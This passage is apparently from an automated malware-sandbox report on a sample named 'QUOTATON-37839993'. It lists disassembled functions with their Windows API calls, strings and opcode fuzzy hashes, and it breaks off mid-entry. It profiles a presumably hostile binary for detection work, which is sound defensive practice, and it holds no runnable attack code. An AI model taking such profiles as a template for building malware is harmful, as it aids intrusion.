                                                                      • CreatePopupMenu.USER32 ref: 00E87241
                                                                      • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00E8726E
                                                                      • DrawMenuBar.USER32 ref: 00E87276
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
                                                                      • String ID: 0$F
                                                                      • API String ID: 176399719-3044882817
                                                                      • Opcode ID: 42efd9cadb8efa6074da961891addad117f968ee380fec3ecb26d1acd6835e64
                                                                      • Instruction ID: 6e3b8ab459355312451d90d8b5f6ddfbf63192bef7aba0f32a9821f76ed6d4b7
                                                                      • Opcode Fuzzy Hash: 42efd9cadb8efa6074da961891addad117f968ee380fec3ecb26d1acd6835e64
                                                                      • Instruction Fuzzy Hash: FD4136B5A01205EFDB20EFA5D988E9ABBB5FF49310F240029F959B7361D731AD14CB90
                                                                      Function 00E874BB Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 101windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 00E8755E
                                                                      • CreateCompatibleDC.GDI32(00000000), ref: 00E87565
                                                                      • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 00E87578
                                                                      • SelectObject.GDI32(00000000,00000000), ref: 00E87580
                                                                      • GetPixel.GDI32(00000000,00000000,00000000), ref: 00E8758B
                                                                      • DeleteDC.GDI32(00000000), ref: 00E87594
                                                                      • GetWindowLongW.USER32(?,000000EC), ref: 00E8759E
                                                                      • SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 00E875B2
                                                                      • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 00E875BE
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                                                      • String ID: static
                                                                      • API String ID: 2559357485-2160076837
                                                                      • Opcode ID: 45063b85c19d4ff5c54cc66772cb455591d0cf9e7343768dd497f9633a4f238e
                                                                      • Instruction ID: 8f1767eb87a5818bd2c123783cd6a4b2a6d45dfacd53d227b6018d83bf7124ee
                                                                      • Opcode Fuzzy Hash: 45063b85c19d4ff5c54cc66772cb455591d0cf9e7343768dd497f9633a4f238e
                                                                      • Instruction Fuzzy Hash: 6C318A32104214AFDF11AFA5DC08FDA3BA9EF09325F201224FA5DB60A0C731D825DBA0
                                                                      Function 00E26E03 Relevance: 16.8, APIs: 11, Instructions: 258COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • _memset.LIBCMT ref: 00E26E3E
                                                                        • Part of subcall function 00E28B28: __getptd_noexit.LIBCMT ref: 00E28B28
                                                                      • __gmtime64_s.LIBCMT ref: 00E26ED7
                                                                      • __gmtime64_s.LIBCMT ref: 00E26F0D
                                                                      • __gmtime64_s.LIBCMT ref: 00E26F2A
                                                                      • __allrem.LIBCMT ref: 00E26F80
                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00E26F9C
                                                                      • __allrem.LIBCMT ref: 00E26FB3
                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00E26FD1
                                                                      • __allrem.LIBCMT ref: 00E26FE8
                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00E27006
                                                                      • __invoke_watson.LIBCMT ref: 00E27077
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                                                                      • String ID:
                                                                      • API String ID: 384356119-0
                                                                      • Opcode ID: 1572197e9c4cf49d3ac3c19b6e82465e4eefa01e3d88f7bbd38cf7a66862b9c5
                                                                      • Instruction ID: b488bebfbb111d7018eca14517fc75ebf16056d50408d6054bd0a87d11416983
                                                                      • Opcode Fuzzy Hash: 1572197e9c4cf49d3ac3c19b6e82465e4eefa01e3d88f7bbd38cf7a66862b9c5
                                                                      • Instruction Fuzzy Hash: 1C71E576A00726ABEB14AE78EC41B5AB7E8AF04724F145229F554F72C1E770EE448790
                                                                      Function 00E62527 Relevance: 16.7, APIs: 11, Instructions: 190windowsleepCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • _memset.LIBCMT ref: 00E62542
                                                                      • GetMenuItemInfoW.USER32(00EC5890,000000FF,00000000,00000030), ref: 00E625A3
                                                                      • SetMenuItemInfoW.USER32(00EC5890,00000004,00000000,00000030), ref: 00E625D9
                                                                      • Sleep.KERNEL32(000001F4), ref: 00E625EB
                                                                      • GetMenuItemCount.USER32(?), ref: 00E6262F
                                                                      • GetMenuItemID.USER32(?,00000000), ref: 00E6264B
                                                                      • GetMenuItemID.USER32(?,-00000001), ref: 00E62675
                                                                      • GetMenuItemID.USER32(?,?), ref: 00E626BA
                                                                      • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00E62700
                                                                      • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00E62714
                                                                      • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00E62735
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                                                                      • String ID:
                                                                      • API String ID: 4176008265-0
                                                                      • Opcode ID: f24e5b4db8c437f63af6ebc9ccd4dd0c5274cab03d94ba251bac90775ad0b6ca
                                                                      • Instruction ID: 1c57bcf63d1382f1732a6006876357f79646624a9d7419ad8e563b66e7d77876
                                                                      • Opcode Fuzzy Hash: f24e5b4db8c437f63af6ebc9ccd4dd0c5274cab03d94ba251bac90775ad0b6ca
                                                                      • Instruction Fuzzy Hash: 7161A3B0940A49AFDB11CFA4EC84DFE7BB8EB01388F14516DEA42B7291D731AD05DB21
                                                                      Function 00E86F23 Relevance: 16.7, APIs: 11, Instructions: 184windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00E86FA5
                                                                      • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00E86FA8
                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00E86FCC
                                                                      • _memset.LIBCMT ref: 00E86FDD
                                                                      • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00E86FEF
                                                                      • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00E87067
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend$LongWindow_memset
                                                                      • String ID:
                                                                      • API String ID: 830647256-0
                                                                      • Opcode ID: 7145c77c3167b3b7b7e20358bd0a1c692662680fe33aab7a6d7b4ff02139b1d2
                                                                      • Instruction ID: d187e2eb85db1b00e7f292d16a4b075f0a9c5adc5beaee0cec79aca1c6549d5a
                                                                      • Opcode Fuzzy Hash: 7145c77c3167b3b7b7e20358bd0a1c692662680fe33aab7a6d7b4ff02139b1d2
                                                                      • Instruction Fuzzy Hash: 9C617D71900208AFDB10DFA4CD85EEE77F8EB09714F24116AFA18BB2A1C771AD45DB90
                                                                      Function 00E56B98 Relevance: 16.6, APIs: 11, Instructions: 123memoryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00E56BBF
                                                                      • SafeArrayAllocData.OLEAUT32(?), ref: 00E56C18
                                                                      • VariantInit.OLEAUT32(?), ref: 00E56C2A
                                                                      • SafeArrayAccessData.OLEAUT32(?,?), ref: 00E56C4A
                                                                      • VariantCopy.OLEAUT32(?,?), ref: 00E56C9D
                                                                      • SafeArrayUnaccessData.OLEAUT32(?), ref: 00E56CB1
                                                                      • VariantClear.OLEAUT32(?), ref: 00E56CC6
                                                                      • SafeArrayDestroyData.OLEAUT32(?), ref: 00E56CD3
                                                                      • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00E56CDC
                                                                      • VariantClear.OLEAUT32(?), ref: 00E56CEE
                                                                      • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00E56CF9
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                                      • String ID:
                                                                      • API String ID: 2706829360-0
                                                                      • Opcode ID: 6b2b851462f17b2f3d614f24a0cf025dfa17ecbf62ff89223fc07a7d1a4268cb
                                                                      • Instruction ID: 792cdebcf246f8b85fc771d762164040473971cca850dc8f62b8ea86bbcdeabd
                                                                      • Opcode Fuzzy Hash: 6b2b851462f17b2f3d614f24a0cf025dfa17ecbf62ff89223fc07a7d1a4268cb
                                                                      • Instruction Fuzzy Hash: F2415F71A002199FCF04DFA9D8449AEBBB9EF08355F408469E955F7261CB30A949CFA0
                                                                      Function 00E75732 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 163networkfileCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • WSAStartup.WSOCK32(00000101,?), ref: 00E75793
                                                                      • inet_addr.WSOCK32(?,?,?), ref: 00E757D8
                                                                      • gethostbyname.WSOCK32(?), ref: 00E757E4
                                                                      • IcmpCreateFile.IPHLPAPI ref: 00E757F2
                                                                      • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00E75862
                                                                      • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00E75878
                                                                      • IcmpCloseHandle.IPHLPAPI(00000000), ref: 00E758ED
                                                                      • WSACleanup.WSOCK32 ref: 00E758F3
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                                      • String ID: Ping
                                                                      • API String ID: 1028309954-2246546115
                                                                      • Opcode ID: 6e54ea16fefab3804631209a23a6ba823f13c6912479bc176ca704ac2d6f7a80
                                                                      • Instruction ID: 1089142df7f488e525e29ff92442acce0600d8f5cb9f945de18c2b2de80e6618
                                                                      • Opcode Fuzzy Hash: 6e54ea16fefab3804631209a23a6ba823f13c6912479bc176ca704ac2d6f7a80
                                                                      • Instruction Fuzzy Hash: 36518F326007009FE7149F65DC45B6AB7E4AF48714F149929F95AFB2A1DB70E844CF42
                                                                      Function 00E6B4C3 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 98COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • SetErrorMode.KERNEL32(00000001), ref: 00E6B4D0
                                                                      • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 00E6B546
                                                                      • GetLastError.KERNEL32 ref: 00E6B550
                                                                      • SetErrorMode.KERNEL32(00000000,READY), ref: 00E6B5BD
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: Error$Mode$DiskFreeLastSpace
                                                                      • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                                      • API String ID: 4194297153-14809454
                                                                      • Opcode ID: 5ad6d92b4e9eb964a7a6491d6d5cb86931f6ea819289a3a2152426fc0dbef4e7
                                                                      • Instruction ID: 528e94319c08bf2db6603cccd733e6961e3becc0a264ce5dfeceb102a35a48cb
                                                                      • Opcode Fuzzy Hash: 5ad6d92b4e9eb964a7a6491d6d5cb86931f6ea819289a3a2152426fc0dbef4e7
                                                                      • Instruction Fuzzy Hash: E8319035A80209EFCB00EF68E885EEE7BB5FF49354F105125E506F7292DB709A85CB91
                                                                      Function 00E58F8F Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 82windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 00E07DE1: _memmove.LIBCMT ref: 00E07E22
                                                                        • Part of subcall function 00E5AA99: GetClassNameW.USER32(?,?,000000FF), ref: 00E5AABC
                                                                      • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 00E59014
                                                                      • GetDlgCtrlID.USER32 ref: 00E5901F
                                                                      • GetParent.USER32 ref: 00E5903B
                                                                      • SendMessageW.USER32(00000000,?,00000111,?), ref: 00E5903E
                                                                      • GetDlgCtrlID.USER32(?), ref: 00E59047
                                                                      • GetParent.USER32(?), ref: 00E59063
                                                                      • SendMessageW.USER32(00000000,?,?,00000111), ref: 00E59066
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend$CtrlParent$ClassName_memmove
                                                                      • String ID: ComboBox$ListBox
                                                                      • API String ID: 1536045017-1403004172
                                                                      • Opcode ID: bea5c404062d15e8d3d44d788774d4431938ddc5bf46a48892628452e0680d28
                                                                      • Instruction ID: 045225d101d20a757c681f6d19597e8b8116d2f95aad3a0da00e3239e0d5288b
                                                                      • Opcode Fuzzy Hash: bea5c404062d15e8d3d44d788774d4431938ddc5bf46a48892628452e0680d28
                                                                      • Instruction Fuzzy Hash: 3C21A370A00208BFDF04ABA1CC85EFEB7A5EF45310F101615F961772E2DB755859DB20
                                                                      Function 00E5907A Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 81windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 00E07DE1: _memmove.LIBCMT ref: 00E07E22
                                                                        • Part of subcall function 00E5AA99: GetClassNameW.USER32(?,?,000000FF), ref: 00E5AABC
                                                                      • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 00E590FD
                                                                      • GetDlgCtrlID.USER32 ref: 00E59108
                                                                      • GetParent.USER32 ref: 00E59124
                                                                      • SendMessageW.USER32(00000000,?,00000111,?), ref: 00E59127
                                                                      • GetDlgCtrlID.USER32(?), ref: 00E59130
                                                                      • GetParent.USER32(?), ref: 00E5914C
                                                                      • SendMessageW.USER32(00000000,?,?,00000111), ref: 00E5914F
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend$CtrlParent$ClassName_memmove
                                                                      • String ID: ComboBox$ListBox
                                                                      • API String ID: 1536045017-1403004172
                                                                      • Opcode ID: 7eb4afab97e9932568971277b1c6618d5567c06088eb9d9a42e9d22392bea274
                                                                      • Instruction ID: bbdeab1d18f85a1e3a7be925ae433ee6aa540b9fe2d1e65f50841625c9e3dd2d
                                                                      • Opcode Fuzzy Hash: 7eb4afab97e9932568971277b1c6618d5567c06088eb9d9a42e9d22392bea274
                                                                      • Instruction Fuzzy Hash: B121D374A00208BFDF10ABA1CC85EFEBBB8EF45300F101525F955B72A2EB755859DB20
                                                                      Function 00E59163 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 72windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetParent.USER32 ref: 00E5916F
                                                                      • GetClassNameW.USER32(00000000,?,00000100), ref: 00E59184
                                                                      • _wcscmp.LIBCMT ref: 00E59196
                                                                      • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00E59211
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: ClassMessageNameParentSend_wcscmp
                                                                      • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                                      • API String ID: 1704125052-3381328864
                                                                      • Opcode ID: da96cb92e32a23f7dfafe08b06d6761bcedda74158f82dcf9cca8c84bb7d4834
                                                                      • Instruction ID: bf164ad2ece15da6e4768212839a70959837af31654f762ba0f80e5dbe38d8c5
                                                                      • Opcode Fuzzy Hash: da96cb92e32a23f7dfafe08b06d6761bcedda74158f82dcf9cca8c84bb7d4834
                                                                      • Instruction Fuzzy Hash: D711593A288317FAFA112624FC0ADE737DCDB50321F212426FE04F14E3FE6168596A94
                                                                      Function 00E67990 Relevance: 15.3, APIs: 10, Instructions: 292COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • SafeArrayGetVartype.OLEAUT32(00000000,?), ref: 00E67A6C
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: ArraySafeVartype
                                                                      • String ID:
                                                                      • API String ID: 1725837607-0
                                                                      • Opcode ID: 07f950709c145fa0513894298486a99d8b2cd681064f8062e9d616982ce13226
                                                                      • Instruction ID: ff9546e76bde6a6d96b9b2a271846fb25e374e33302d4093fb039fcf00199fd4
                                                                      • Opcode Fuzzy Hash: 07f950709c145fa0513894298486a99d8b2cd681064f8062e9d616982ce13226
                                                                      • Instruction Fuzzy Hash: B0B1BF7194821A9FDB00DFA4E884BBEB7F4FF09369F205429E991F7291D734A941CB90
                                                                      Function 00E0FA5D Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 264comCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00E0FAA6
                                                                      • OleUninitialize.OLE32(?,00000000), ref: 00E0FB45
                                                                      • UnregisterHotKey.USER32(?), ref: 00E0FC9C
                                                                      • DestroyWindow.USER32(?), ref: 00E445D6
                                                                      • FreeLibrary.KERNEL32(?), ref: 00E4463B
                                                                      • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00E44668
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                                      • String ID: close all
                                                                      • API String ID: 469580280-3243417748
                                                                      • Opcode ID: 5ff60059f5036c89499c8f72669705daee976798302699d3289e549515e24aaa
                                                                      • Instruction ID: 7ec4ce5685cf0773cd352ce5db04adb68948df80566150c9e72c544eabbf4ce5
                                                                      • Opcode Fuzzy Hash: 5ff60059f5036c89499c8f72669705daee976798302699d3289e549515e24aaa
                                                                      • Instruction Fuzzy Hash: 81A18E71301212CFDB29EF14D595B69F3A4BF05704F5562ADE80ABB2A2CB30AC56CF94
                                                                      Function 00E79113 Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 263COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
